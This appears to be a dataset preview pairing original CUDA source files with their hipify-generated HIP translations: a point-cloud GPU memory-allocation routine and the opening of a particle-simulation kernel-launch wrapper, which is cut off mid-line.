Columns (one row per file pair; all values are strings, shown with their observed length ranges):

    hip_filename    5 to 84 characters
    hip_content     79 characters to 9.69M characters
    cuda_filename   4 to 83 characters
    cuda_content    19 characters to 9.69M characters
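Each row pairs an original CUDA source file (cuda_content) with the HIP translation emitted by the hipify tool (hip_content), which prepends the marker "// !!! This is a file automatically generated by hipify!!!". As a rough illustration of the mechanical mapping the pairs below exhibit, here is a minimal sketch, not taken from the dataset; the kernel name, buffer, and launch shape are invented for illustration, and error checking is omitted:

    // HIP form, as produced by hipify from an equivalent CUDA fragment.
    // CUDA -> HIP renames seen in the rows below:
    //   #include <cuda_runtime.h>      -> #include <hip/hip_runtime.h>
    //   cudaMalloc / cudaMemcpy / ...  -> hipMalloc / hipMemcpy / ...
    //   cudaStream_t, cudaGetLastError -> hipStream_t, hipGetLastError
    //   kernel<<<grid, block, 0, s>>>(...) -> hipLaunchKernelGGL(kernel, grid, block, 0, s, ...)
    #include <hip/hip_runtime.h>

    // Illustrative kernel: scale n floats in place by k.
    __global__ void scale(float* buf, int n, float k) {
        int i = blockDim.x * blockIdx.x + threadIdx.x;
        if (i < n) buf[i] *= k;
    }

    // Illustrative host wrapper: allocate, copy in, launch, copy out, free.
    int runScale(float* h_buf, int n, hipStream_t stream) {
        float* d_buf = nullptr;
        hipMalloc(&d_buf, n * sizeof(float));                               // was cudaMalloc
        hipMemcpy(d_buf, h_buf, n * sizeof(float), hipMemcpyHostToDevice);  // was cudaMemcpy(..., cudaMemcpyHostToDevice)
        dim3 block(256), grid((n + 255) / 256);
        // was: scale<<<grid, block, 0, stream>>>(d_buf, n, 2.0f);
        hipLaunchKernelGGL(scale, grid, block, 0, stream, d_buf, n, 2.0f);
        hipMemcpy(h_buf, d_buf, n * sizeof(float), hipMemcpyDeviceToHost);  // was cudaMemcpy(..., cudaMemcpyDeviceToHost)
        hipFree(d_buf);                                                     // was cudaFree
        return 0;
    }

Sample rows follow, each given as a filename line and then the corresponding file content: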
2c0a22caacec9718680d6a407a742f57f70b98dd.hip
// !!! This is a file automatically generated by hipify!!! #include <hip/hip_runtime.h> #include <source2.cuh> #include <device_launch_parameters.h> #include <hip/hip_runtime.h> #include <helper_functions.h> #include <c:/Users/mtf_d/Desktop/src/IUnclassifiedPoints.h> #include "c:/Users/mtf_d/Desktop/src/IPoint.h" #include "c:/Users/mtf_d/Desktop/src/IUnclassifiedPoints.h" #include "c:/Users/mtf_d/Desktop/src/StackedPoints.h" #include <c:/Users/mtf_d/Desktop/src/UnclassifiedPoints.h> //#include "c:/Users/mtf_d/Desktop/src/PointVector.h" namespace mcc { __global__ void basari(double ***A, int Asize) { int threadID = blockDim.x * blockIdx.x + threadIdx.x; //printf("thread id : %d", threadID); //printf(" %f\n", A[threadID][threadID][threadID]); for (int i = threadID; i < Asize; i++) { int tSize = A[i][0][3]; for (int j = 0; j < tSize; j++) { //std::cout << A[i][j][0] << " "; printf("X:%f %d", A[i][j][0],threadID); //std::cout << A[i][j][1] << " "; printf("Y:%f %d", A[i][j][1], threadID); //std::cout << A[i][j][3] << " "; printf("Z:%f %d", A[i][j][2], threadID); //std::cout << A[i][j][4] << " "; printf("S:%f %d", A[i][j][3], threadID); printf("\n"); } printf("\n"); } } __global__ void luDeSpline(double***A, double***mtx_v, double***mtx_l, double***cells) { } __global__ void cels(double ***cells) { int threadID = blockDim.x * blockIdx.x + threadIdx.x; printf("tid : %d cell.x : %f cell.y : %f\n", threadID, cells[threadID][0][1], cells[threadID][0][2]); } int source2::bos(double ***A, double ***cellsize, int Asize) { //allocate control_points std::cout << "begin d_C" << std::endl; double*** h_c = (double***)malloc(Asize * sizeof(double**)); for (int i = 0; i < Asize; i++) { int twoSize = A[i][0][3]; h_c[i] = (double**)malloc(twoSize * sizeof(double*)); for (int j = 0; j < twoSize; j++) { hipMalloc((void**)&h_c[i][j], 4 * sizeof(double)); hipMemcpy(h_c[i][j], A[i][j], 4 * sizeof(double), hipMemcpyHostToDevice); } } double ***h_c1 = (double ***)malloc(Asize * sizeof(double **)); for (int i = 0; i < Asize; i++) { int twoSize = A[i][0][3]; hipMalloc((void***)&(h_c1[i]), twoSize * sizeof(double*)); hipMemcpy(h_c1[i], h_c[i], twoSize * sizeof(double*), hipMemcpyHostToDevice); } double*** d_c; hipMalloc((void****)&d_c, Asize * sizeof(double**)); hipMemcpy(d_c, h_c1, Asize * sizeof(double**), hipMemcpyHostToDevice); std::cout << "end d_C" << std::endl; //allocate mtx_v std::cout << "begin mtx_v" << std::endl; double*** mtx_v1 = (double***)malloc(Asize * sizeof(double**)); for (int i = 0; i < Asize; i++) { int twoSize = A[i][0][3]+3; mtx_v1[i] = (double**)malloc(twoSize * sizeof(double*)); for (int j = 0; j < twoSize; j++) { hipMalloc((void**)&mtx_v1[i][j], 1 * sizeof(double)); } } double ***mtx_v = (double ***)malloc(Asize * sizeof(double **)); for (int i = 0; i < Asize; i++) { int twoSize = A[i][0][3]; hipMalloc((void***)&(mtx_v[i]), twoSize * sizeof(double*)); hipMemcpy(mtx_v[i], h_c[i], twoSize * sizeof(double*), hipMemcpyHostToDevice); } double*** d_mtx_v; hipMalloc((void****)&d_mtx_v, Asize * sizeof(double**)); hipMemcpy(d_mtx_v, mtx_v, Asize * sizeof(double**), hipMemcpyHostToDevice); std::cout << "end mtx_v" << std::endl; //allocate mtx_l std::cout << "begin mtx_l" << std::endl; double*** mtx_l1 = (double***)malloc(Asize * sizeof(double**)); for (int i = 0; i < Asize; i++) { int twoSize = A[i][0][3] + 3; mtx_l1[i] = (double**)malloc(twoSize * sizeof(double*)); for (int j = 0; j < twoSize; j++) { hipMalloc((void**)&mtx_l1[i][j], twoSize * sizeof(double)); } } double ***mtx_l = (double 
***)malloc(Asize * sizeof(double **)); for (int i = 0; i < Asize; i++) { int twoSize = A[i][0][3] + 3; hipMalloc((void***)&(mtx_v[i]), twoSize * sizeof(double*)); hipMemcpy(mtx_l1[i], mtx_l[i], twoSize * sizeof(double*), hipMemcpyHostToDevice); } double*** d_mtx_l; hipMalloc((void****)&d_mtx_l, Asize * sizeof(double**)); hipMemcpy(d_mtx_l, mtx_l, Asize * sizeof(double**), hipMemcpyHostToDevice); std::cout << "end mtx_l" << std::endl; //allocate cells std::cout << "begin cells" << std::endl; double*** cells1 = (double***)malloc(Asize * sizeof(double**)); for (int i = 0; i < Asize; i++) { int twoSize = cellsize[i][0][0]; cells1[i] = (double**)malloc(twoSize * sizeof(double*)); for (int j = 0; j < twoSize; j++) { hipMalloc((void**)&cells1[i][j], 3 * sizeof(double)); hipMemcpy(cells1[i][j], cellsize[i][j], 3 * sizeof(double), hipMemcpyHostToDevice); } } double ***cells = (double ***)malloc(Asize * sizeof(double **)); for (int i = 0; i < Asize; i++) { int twoSize = cellsize[i][0][0]; hipMalloc((void***)&(mtx_v[i]), twoSize * sizeof(double*)); hipMemcpy(cells[i], cells1[i], twoSize * sizeof(double*), hipMemcpyHostToDevice); } double*** d_cells; hipMalloc((void****)&d_cells, Asize * sizeof(double**)); hipMemcpy(d_cells, cells, Asize * sizeof(double**), hipMemcpyHostToDevice); std::cout << "end cells" << std::endl; /*double ***d_A; A[0][0][0] = 999; printf("dA 0 0 0 : %f", A[0][0][0]); hipMalloc(&d_A, Asize * sizeof(double)); int x; scanf("%d", &x); printf("allocate started"); for (int i = 0; i < Asize; i++) { int tSize = A[i][0][3]; printf("2"); hipMalloc(&d_A[i], tSize * sizeof(double)); printf("3"); for (int j = 0; j < tSize; j++) { printf("4"); hipMalloc(&d_A[i][j], 4 * sizeof(double)); hipMemcpy(d_A[i][j], A[i][j], 4 * sizeof(double), hipMemcpyHostToDevice); } } printf("allocate completed"); hipMemcpy(&d_A, A, Asize, hipMemcpyHostToDevice); kk << <10, 10 >> > (d_A, 3);*/ /*double **B; hipMalloc(&B, 2 * sizeof(double)); hipMalloc(&B[0], 2 * sizeof(double)); hipMalloc(&B[1], 2 * sizeof(double)); double *C = new double[2]; C[0] = 1; C[1] = 2; double *D = new double[2]; D[0] = 2; D[1] = 3; hipMemcpy(B[0], C, 2 * sizeof(double), hipMemcpyHostToDevice); hipMemcpy(B[1], D, 2 * sizeof(double), hipMemcpyHostToDevice); aa << <2, 2 >> > (B);*/ /*double *C = new double[2]; C[0] = 1; C[1] = 2; double *D = new double[2]; D[0] = 3; D[1] = 4; double **B; hipMalloc(&B[0], 2 * sizeof(double)); hipMalloc(&B[1], 2 * sizeof(double)); hipMemcpy(B[0], C, 2 * sizeof(double), hipMemcpyHostToDevice); hipMemcpy(B[1], D, 2 * sizeof(double), hipMemcpyHostToDevice); hipMalloc(&B, 2 * sizeof(double)); hipMemcpy(B, B, 2 * sizeof(double), hipMemcpyHostToDevice); hipMemcpy(B, B, 2 * sizeof(double), hipMemcpyHostToDevice); aa << <2, 2 >> > ();*/ /*int val = 0; for (int i = 0; i < Asize; i++) { val += A[i][0][3]; } printf("val: %d\n", val); int d = val * 5; printf("val*5: %d\n", d); double *X = (double*)malloc(sizeof(double)*d); double a = 0, b = 0; for (int i = 0, int c = 0; i < Asize; i++) { int tSize = A[i][0][3]; for (int j = 0; j < tSize;) { if (c % 5 == 0) { X[c] = A[i][j][0]; //printf("X : %f i: %d ", X[c], c); } if (c % 5 == 1) { X[c] = A[i][j][1]; //printf("Y : %f i: %d ", X[c], c); } if (c % 5 == 2) { X[c] = A[i][j][2]; //printf("Z : %f i: %d ", X[c], c); } if (c % 5 == 3) { X[c] = A[i][j][3]; //printf("S : %f i: %d ", X[c], c); } if (c % 5 == 4) { a++; X[c] = b; //printf("V--->> : %f i: %d\n", X[c], c); if (a == A[i][j][3]) { //printf("V--->> : %f i: %d\n", X[c], c); a = 0; b++; } j++; } //printf(" a: %f", a); 
//printf(" A: %f\n", A[i][j][3]); if (c == d) break; c++; } } printf("%f\n", X[d - 1]); double *d_A; hipMalloc(&d_A, d * sizeof(double)); hipMemcpy(d_A, X, d * sizeof(double), hipMemcpyHostToDevice); kk << <2,3 >> > (d_A, 3); /*double***d_AA; for (int j = 0; j < Asize; j++) { for (int i = A[0][0][0]; i < Asize; i++) { hipMalloc(&A[i][j], Asize * sizeof(float)); } } printf("allocate started");*/ /*for (int i = 0; i < Asize; i++) { int twoSize = A[i][0][3]; //printf("ilk dng size: %d",twoSize); for (int j = 0; j < twoSize; j++) { //int arrSize = A[i][0][0]; //printf("ikinci dongu"); hipMalloc(&d_AA[i][j], 4 * sizeof(double)); } }*/ /*double*** d_AAA = new double**[Asize]; for (int i = 0; i < Asize; i++) { int twoSize = A[i][0][3]; d_AAA[i] = new double*[twoSize]; for (int j = 0; j < twoSize; j++) { d_AAA[i][j] = new double[4]; } } for (int i = 0; i < Asize; i++) { int twoSize = A[i][0][3]; for (int j = 0; j < twoSize; j++) { hipMalloc(&d_AAA[i][j], 4 * sizeof(double)); } } printf("allocate completed"); printf("%d", Asize); for (int a = 0; a < Asize; a++) { int twoArrSize = A[a][0][3]; //printf("ilk dng size: %d", twoArrSize); for (int b = 0; b < twoArrSize; b++) { //printf("ikinci dongu"); hipMemcpy(d_AAA[a][b], A[a][b], 4 * sizeof(double), hipMemcpyHostToDevice); //printf("atama sonras d_A: %f", d_A[0][0][3]); } } printf("copy completed"); kk << <2, 2 >> > (d_AAA, 3);*/ return 1; } }
2c0a22caacec9718680d6a407a742f57f70b98dd.cu
#include <cuda_runtime.h> #include <source2.cuh> #include <device_launch_parameters.h> #include <cuda.h> #include <helper_functions.h> #include <c:/Users/mtf_d/Desktop/src/IUnclassifiedPoints.h> #include "c:/Users/mtf_d/Desktop/src/IPoint.h" #include "c:/Users/mtf_d/Desktop/src/IUnclassifiedPoints.h" #include "c:/Users/mtf_d/Desktop/src/StackedPoints.h" #include <c:/Users/mtf_d/Desktop/src/UnclassifiedPoints.h> //#include "c:/Users/mtf_d/Desktop/src/PointVector.h" namespace mcc { __global__ void basari(double ***A, int Asize) { int threadID = blockDim.x * blockIdx.x + threadIdx.x; //printf("thread id : %d", threadID); //printf(" %f\n", A[threadID][threadID][threadID]); for (int i = threadID; i < Asize; i++) { int tSize = A[i][0][3]; for (int j = 0; j < tSize; j++) { //std::cout << A[i][j][0] << " "; printf("X:%f %d", A[i][j][0],threadID); //std::cout << A[i][j][1] << " "; printf("Y:%f %d", A[i][j][1], threadID); //std::cout << A[i][j][3] << " "; printf("Z:%f %d", A[i][j][2], threadID); //std::cout << A[i][j][4] << " "; printf("S:%f %d", A[i][j][3], threadID); printf("\n"); } printf("\n"); } } __global__ void luDeSpline(double***A, double***mtx_v, double***mtx_l, double***cells) { } __global__ void cels(double ***cells) { int threadID = blockDim.x * blockIdx.x + threadIdx.x; printf("tid : %d cell.x : %f cell.y : %f\n", threadID, cells[threadID][0][1], cells[threadID][0][2]); } int source2::bos(double ***A, double ***cellsize, int Asize) { //allocate control_points std::cout << "begin d_C" << std::endl; double*** h_c = (double***)malloc(Asize * sizeof(double**)); for (int i = 0; i < Asize; i++) { int twoSize = A[i][0][3]; h_c[i] = (double**)malloc(twoSize * sizeof(double*)); for (int j = 0; j < twoSize; j++) { cudaMalloc((void**)&h_c[i][j], 4 * sizeof(double)); cudaMemcpy(h_c[i][j], A[i][j], 4 * sizeof(double), cudaMemcpyHostToDevice); } } double ***h_c1 = (double ***)malloc(Asize * sizeof(double **)); for (int i = 0; i < Asize; i++) { int twoSize = A[i][0][3]; cudaMalloc((void***)&(h_c1[i]), twoSize * sizeof(double*)); cudaMemcpy(h_c1[i], h_c[i], twoSize * sizeof(double*), cudaMemcpyHostToDevice); } double*** d_c; cudaMalloc((void****)&d_c, Asize * sizeof(double**)); cudaMemcpy(d_c, h_c1, Asize * sizeof(double**), cudaMemcpyHostToDevice); std::cout << "end d_C" << std::endl; //allocate mtx_v std::cout << "begin mtx_v" << std::endl; double*** mtx_v1 = (double***)malloc(Asize * sizeof(double**)); for (int i = 0; i < Asize; i++) { int twoSize = A[i][0][3]+3; mtx_v1[i] = (double**)malloc(twoSize * sizeof(double*)); for (int j = 0; j < twoSize; j++) { cudaMalloc((void**)&mtx_v1[i][j], 1 * sizeof(double)); } } double ***mtx_v = (double ***)malloc(Asize * sizeof(double **)); for (int i = 0; i < Asize; i++) { int twoSize = A[i][0][3]; cudaMalloc((void***)&(mtx_v[i]), twoSize * sizeof(double*)); cudaMemcpy(mtx_v[i], h_c[i], twoSize * sizeof(double*), cudaMemcpyHostToDevice); } double*** d_mtx_v; cudaMalloc((void****)&d_mtx_v, Asize * sizeof(double**)); cudaMemcpy(d_mtx_v, mtx_v, Asize * sizeof(double**), cudaMemcpyHostToDevice); std::cout << "end mtx_v" << std::endl; //allocate mtx_l std::cout << "begin mtx_l" << std::endl; double*** mtx_l1 = (double***)malloc(Asize * sizeof(double**)); for (int i = 0; i < Asize; i++) { int twoSize = A[i][0][3] + 3; mtx_l1[i] = (double**)malloc(twoSize * sizeof(double*)); for (int j = 0; j < twoSize; j++) { cudaMalloc((void**)&mtx_l1[i][j], twoSize * sizeof(double)); } } double ***mtx_l = (double ***)malloc(Asize * sizeof(double **)); for (int i = 0; i < Asize; i++) 
{ int twoSize = A[i][0][3] + 3; cudaMalloc((void***)&(mtx_v[i]), twoSize * sizeof(double*)); cudaMemcpy(mtx_l1[i], mtx_l[i], twoSize * sizeof(double*), cudaMemcpyHostToDevice); } double*** d_mtx_l; cudaMalloc((void****)&d_mtx_l, Asize * sizeof(double**)); cudaMemcpy(d_mtx_l, mtx_l, Asize * sizeof(double**), cudaMemcpyHostToDevice); std::cout << "end mtx_l" << std::endl; //allocate cells std::cout << "begin cells" << std::endl; double*** cells1 = (double***)malloc(Asize * sizeof(double**)); for (int i = 0; i < Asize; i++) { int twoSize = cellsize[i][0][0]; cells1[i] = (double**)malloc(twoSize * sizeof(double*)); for (int j = 0; j < twoSize; j++) { cudaMalloc((void**)&cells1[i][j], 3 * sizeof(double)); cudaMemcpy(cells1[i][j], cellsize[i][j], 3 * sizeof(double), cudaMemcpyHostToDevice); } } double ***cells = (double ***)malloc(Asize * sizeof(double **)); for (int i = 0; i < Asize; i++) { int twoSize = cellsize[i][0][0]; cudaMalloc((void***)&(mtx_v[i]), twoSize * sizeof(double*)); cudaMemcpy(cells[i], cells1[i], twoSize * sizeof(double*), cudaMemcpyHostToDevice); } double*** d_cells; cudaMalloc((void****)&d_cells, Asize * sizeof(double**)); cudaMemcpy(d_cells, cells, Asize * sizeof(double**), cudaMemcpyHostToDevice); std::cout << "end cells" << std::endl; /*double ***d_A; A[0][0][0] = 999; printf("dA 0 0 0 : %f", A[0][0][0]); cudaMalloc(&d_A, Asize * sizeof(double)); int x; scanf("%d", &x); printf("allocate started"); for (int i = 0; i < Asize; i++) { int tSize = A[i][0][3]; printf("2"); cudaMalloc(&d_A[i], tSize * sizeof(double)); printf("3"); for (int j = 0; j < tSize; j++) { printf("4"); cudaMalloc(&d_A[i][j], 4 * sizeof(double)); cudaMemcpy(d_A[i][j], A[i][j], 4 * sizeof(double), cudaMemcpyHostToDevice); } } printf("allocate completed"); cudaMemcpy(&d_A, A, Asize, cudaMemcpyHostToDevice); kk << <10, 10 >> > (d_A, 3);*/ /*double **B; cudaMalloc(&B, 2 * sizeof(double)); cudaMalloc(&B[0], 2 * sizeof(double)); cudaMalloc(&B[1], 2 * sizeof(double)); double *C = new double[2]; C[0] = 1; C[1] = 2; double *D = new double[2]; D[0] = 2; D[1] = 3; cudaMemcpy(B[0], C, 2 * sizeof(double), cudaMemcpyHostToDevice); cudaMemcpy(B[1], D, 2 * sizeof(double), cudaMemcpyHostToDevice); aa << <2, 2 >> > (B);*/ /*double *C = new double[2]; C[0] = 1; C[1] = 2; double *D = new double[2]; D[0] = 3; D[1] = 4; double **B; cudaMalloc(&B[0], 2 * sizeof(double)); cudaMalloc(&B[1], 2 * sizeof(double)); cudaMemcpy(B[0], C, 2 * sizeof(double), cudaMemcpyHostToDevice); cudaMemcpy(B[1], D, 2 * sizeof(double), cudaMemcpyHostToDevice); cudaMalloc(&B, 2 * sizeof(double)); cudaMemcpy(B, B, 2 * sizeof(double), cudaMemcpyHostToDevice); cudaMemcpy(B, B, 2 * sizeof(double), cudaMemcpyHostToDevice); aa << <2, 2 >> > ();*/ /*int val = 0; for (int i = 0; i < Asize; i++) { val += A[i][0][3]; } printf("val: %d\n", val); int d = val * 5; printf("val*5: %d\n", d); double *X = (double*)malloc(sizeof(double)*d); double a = 0, b = 0; for (int i = 0, int c = 0; i < Asize; i++) { int tSize = A[i][0][3]; for (int j = 0; j < tSize;) { if (c % 5 == 0) { X[c] = A[i][j][0]; //printf("X : %f i: %d ", X[c], c); } if (c % 5 == 1) { X[c] = A[i][j][1]; //printf("Y : %f i: %d ", X[c], c); } if (c % 5 == 2) { X[c] = A[i][j][2]; //printf("Z : %f i: %d ", X[c], c); } if (c % 5 == 3) { X[c] = A[i][j][3]; //printf("S : %f i: %d ", X[c], c); } if (c % 5 == 4) { a++; X[c] = b; //printf("V--->> : %f i: %d\n", X[c], c); if (a == A[i][j][3]) { //printf("V--->> : %f i: %d\n", X[c], c); a = 0; b++; } j++; } //printf(" a: %f", a); //printf(" A: %f\n", A[i][j][3]); if 
(c == d) break; c++; } } printf("%f\n", X[d - 1]); double *d_A; cudaMalloc(&d_A, d * sizeof(double)); cudaMemcpy(d_A, X, d * sizeof(double), cudaMemcpyHostToDevice); kk << <2,3 >> > (d_A, 3); /*double***d_AA; for (int j = 0; j < Asize; j++) { for (int i = A[0][0][0]; i < Asize; i++) { cudaMalloc(&A[i][j], Asize * sizeof(float)); } } printf("allocate started");*/ /*for (int i = 0; i < Asize; i++) { int twoSize = A[i][0][3]; //printf("ilk döngü size: %d",twoSize); for (int j = 0; j < twoSize; j++) { //int arrSize = A[i][0][0]; //printf("ikinci dongu"); cudaMalloc(&d_AA[i][j], 4 * sizeof(double)); } }*/ /*double*** d_AAA = new double**[Asize]; for (int i = 0; i < Asize; i++) { int twoSize = A[i][0][3]; d_AAA[i] = new double*[twoSize]; for (int j = 0; j < twoSize; j++) { d_AAA[i][j] = new double[4]; } } for (int i = 0; i < Asize; i++) { int twoSize = A[i][0][3]; for (int j = 0; j < twoSize; j++) { cudaMalloc(&d_AAA[i][j], 4 * sizeof(double)); } } printf("allocate completed"); printf("%d", Asize); for (int a = 0; a < Asize; a++) { int twoArrSize = A[a][0][3]; //printf("ilk döngü size: %d", twoArrSize); for (int b = 0; b < twoArrSize; b++) { //printf("ikinci dongu"); cudaMemcpy(d_AAA[a][b], A[a][b], 4 * sizeof(double), cudaMemcpyHostToDevice); //printf("atama sonrası d_A: %f", d_A[0][0][3]); } } printf("copy completed"); kk << <2, 2 >> > (d_AAA, 3);*/ return 1; } }
f87d8ec53c60c1341ca2d987fa2943b31d98329e.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include <stdio.h> #include "DataType.h" #include "DeviceProcess.h" #include "DeviceProcess_Kernel.h" #include <thrust/host_vector.h> #include <thrust/device_vector.h> #include <thrust/sort.h> #include <thrust/copy.h> #include <thrust/sequence.h> #include <thrust/random.h> #include <thrust/generate.h> #include <thrust/detail/type_traits.h> #include "IO.h" #include "Configuration.h" #define USECDUASTREAM //Round a / b to nearest higher integer value unsigned int iDivUp(unsigned int a, unsigned int b){ return (a % b != 0) ? (a / b + 1) : (a / b); } class CThreadScaler { private: Integer Dg; Integer Db; public: CThreadScaler(Integer NumThreads) { Db = min ( BLOCK_MAX_DIM, NumThreads); if(Db > 0) { Dg = iDivUp(NumThreads, Db); }else { Dg = 0; } } Integer Grids() { return Dg; } Integer Blocks() { return Db; } }; extern "C" { /*inline void check_cuda_errors(const char *filename, const int line_number) { #ifdef DEBUG hipDeviceSynchronize(); hipError_t error = hipGetLastError(); if(error != hipSuccess) { printf("CUDA error at %s:%i: %s\n", filename, line_number, hipGetErrorString(error)); exit(-1); } #endif }*/ CCTStatusType CalcTurbulenceViscosity(hipStream_t &Stream,Integer ComputeParticleNum) { if(ComputeParticleNum > 0) { CCTStatusType StatusType; CThreadScaler TS(ComputeParticleNum); hipLaunchKernelGGL(( CalcTurbulenceViscosity_Kernel), dim3(TS.Grids()), dim3(TS.Blocks()) ,0,Stream, ComputeParticleNum); //std::string kernelName = "CalcTurbulenceViscosity"; //WriteConstant(kernelName,ComputeParticleNum); //check_cuda_errors(__FILE__, __LINE__); StatusType = CudaSafeCall(hipGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } //Check Particle outside compute zone starts CCTStatusType CheckParticleOutsideComputeZone(hipStream_t &Stream,Integer *ParticleNum) { if((*ParticleNum) > 0) { CThreadScaler TS(*ParticleNum); hipLaunchKernelGGL(( CheckParticleOutsideComputeZone_Kernel), dim3(TS.Grids()),dim3(TS.Blocks()),0,Stream, ParticleNum); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType; StatusType = CudaSafeCall(hipGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } //Check particle Outside Compute Zone Ends CCTStatusType CalcExplicitly(hipStream_t &Stream,Integer ComputeParticleNum) { if((ComputeParticleNum) > 0) { CCTStatusType StatusType; CThreadScaler TS(ComputeParticleNum); hipLaunchKernelGGL(( CalcExplicitly_Kernel), dim3(TS.Grids()),dim3(TS.Blocks()),0,Stream, ComputeParticleNum); //check_cuda_errors(__FILE__, __LINE__); StatusType = CudaSafeCall(hipGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType ResetTriangleTopology(hipStream_t &Stream,Integer CellNum, CCell* aCell) { if(CellNum > 0) { CThreadScaler TS(CellNum); hipLaunchKernelGGL(( ResetTriangleTopology_Kernel), dim3(TS.Grids()),dim3(TS.Blocks()),0,Stream, CellNum, aCell); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType; StatusType = CudaSafeCall(hipGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType RegisterTriangleTopology(hipStream_t &Stream,CTriangle* daTriangle, Integer TriangleNum, CCell* daCell, Integer CellNum) { unsigned int DbTriangle = min ( BLOCK_MAX_DIM, TriangleNum); unsigned int DgTriangle = iDivUp(TriangleNum, DbTriangle); hipLaunchKernelGGL(( RegisterTriangleTopology_Kernel), dim3(DgTriangle), dim3(DbTriangle),0,Stream, daTriangle, TriangleNum, daCell, CellNum); //check_cuda_errors(__FILE__, __LINE__); 
CCTStatusType StatusType; StatusType = CudaSafeCall(hipGetLastError()); CCT_ERROR_CHECK(StatusType); return CCT_NOERR; } CCTStatusType UpdateTrianglePosition(hipStream_t &Stream,const Integer TriangleNum, CTriangle* daTriangles) { unsigned int DbTriangle = min ( BLOCK_MAX_DIM, TriangleNum); unsigned int DgTriangle = iDivUp(TriangleNum, DbTriangle); hipLaunchKernelGGL(( UpdateTrianglePosition_Kernel), dim3(DgTriangle), dim3(DbTriangle),0,Stream, TriangleNum, daTriangles); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType; StatusType = CudaSafeCall(hipGetLastError()); CCT_ERROR_CHECK(StatusType); return CCT_NOERR; } CCTStatusType RotateTrianglePosition(hipStream_t &Stream,const Integer TriangleNum,CTriangle* daTriangles, const Integer analysisStep) { unsigned int DbTriangle = min ( BLOCK_MAX_DIM, TriangleNum); unsigned int DgTriangle = iDivUp(TriangleNum, DbTriangle); hipLaunchKernelGGL(( RotateTrianglePosition_Kernel), dim3(DgTriangle), dim3(DbTriangle),0,Stream, TriangleNum, daTriangles, analysisStep); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType; StatusType = CudaSafeCall(hipGetLastError()); CCT_ERROR_CHECK(StatusType); return CCT_NOERR; } CCTStatusType ResetWallPosition(hipStream_t &Stream,const Integer TriangleNum,const Integer AnalysisStep,const CTriangle* daTriangles) { unsigned int DbTriangle = min ( BLOCK_MAX_DIM, TriangleNum); unsigned int DgTriangle = iDivUp(TriangleNum, DbTriangle); hipLaunchKernelGGL(( ResetWallPosition_Kernel), dim3(DgTriangle), dim3(DbTriangle),0,Stream, TriangleNum,AnalysisStep, daTriangles); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType; StatusType = CudaSafeCall(hipGetLastError()); CCT_ERROR_CHECK(StatusType); return CCT_NOERR; } CCTStatusType CalcSTLDistance(hipStream_t &Stream, Integer ComputeParticleNum) { if(ComputeParticleNum > 0) { CThreadScaler TS(ComputeParticleNum); hipLaunchKernelGGL(( CalcSTLDistance_Kernel), dim3(TS.Grids()),dim3(TS.Blocks()),0,Stream, ComputeParticleNum); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType = CudaSafeCall(hipGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType CaculateCellIDandInitializeHash(hipStream_t &Stream,Integer ParticleNum,Integer CellNum,int* dGridParticleHash, int* dGridParticleIndex, Scalar3* particlePosition) { if(ParticleNum > 0) { CThreadScaler TS(ParticleNum); // calculate grid hash hipLaunchKernelGGL(( calcHashD), dim3(TS.Grids()), dim3(TS.Blocks()) ,0,Stream, ParticleNum,dGridParticleHash,dGridParticleIndex,particlePosition); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType = CudaSafeCall(hipGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType reorderDataAndFindCellStart(hipStream_t& Stream,Integer numParticles,Integer numCells , int* gridParticleHash, int* gridParticleIndex, int* cellStart, int* cellEnd) { if(numParticles > 0) { CThreadScaler TS(numParticles); // set all cells to empty hipMemsetAsync(cellStart, 0xffffffff, numCells*sizeof(int),Stream); hipMemsetAsync(cellEnd, 0xffffffff, numCells*sizeof(int),Stream); int smemSize = sizeof(int)*(TS.Blocks()+1); hipLaunchKernelGGL(( reorderDataAndFindCellStartD), dim3(TS.Grids()), dim3(TS.Blocks()), smemSize,Stream, numParticles,numCells,gridParticleHash, gridParticleIndex,cellStart, cellEnd); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType = CudaSafeCall(hipGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType SortUsingThrust(Integer MaxParticleNum, Integer 
* daNumberHash, Integer* daNumberIndex) { CCTStatusType Status = CCT_NOERR; if(MaxParticleNum > 0) { thrust::sort_by_key(thrust::device_ptr<Integer>(daNumberHash), thrust::device_ptr<Integer>(daNumberHash + MaxParticleNum), thrust::device_ptr<Integer>(daNumberIndex)); //check_cuda_errors(__FILE__, __LINE__); Status = CudaSafeCall(hipGetLastError()); CCT_ERROR_CHECK(Status); } return Status; } CCTStatusType StableSortUsingThrust(Integer MaxParticleNum, Integer * daNumberHash, Integer* daNumberIndex) { CCTStatusType Status = CCT_NOERR; if(MaxParticleNum > 0) { thrust::stable_sort_by_key(thrust::device_ptr<Integer>(daNumberHash), thrust::device_ptr<Integer>(daNumberHash + MaxParticleNum), thrust::device_ptr<Integer>(daNumberIndex)); //check_cuda_errors(__FILE__, __LINE__); Status = CudaSafeCall(hipGetLastError()); CCT_ERROR_CHECK(Status); } return Status; } CCTStatusType CalcDragEffect(hipStream_t &Stream,Integer ComputeParticleNum) { if((ComputeParticleNum) > 0) { CThreadScaler TS(ComputeParticleNum); hipLaunchKernelGGL(( CalcDragEffect_Kernel), dim3(TS.Grids()),dim3(TS.Blocks()),0,Stream, ComputeParticleNum); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType = CudaSafeCall(hipGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType CalcExplicitPressure(hipStream_t &Stream,Integer ComputeParticleNum) { if((ComputeParticleNum) > 0) { CThreadScaler TS(ComputeParticleNum); hipLaunchKernelGGL(( CalcExplicitPressure_Kernel), 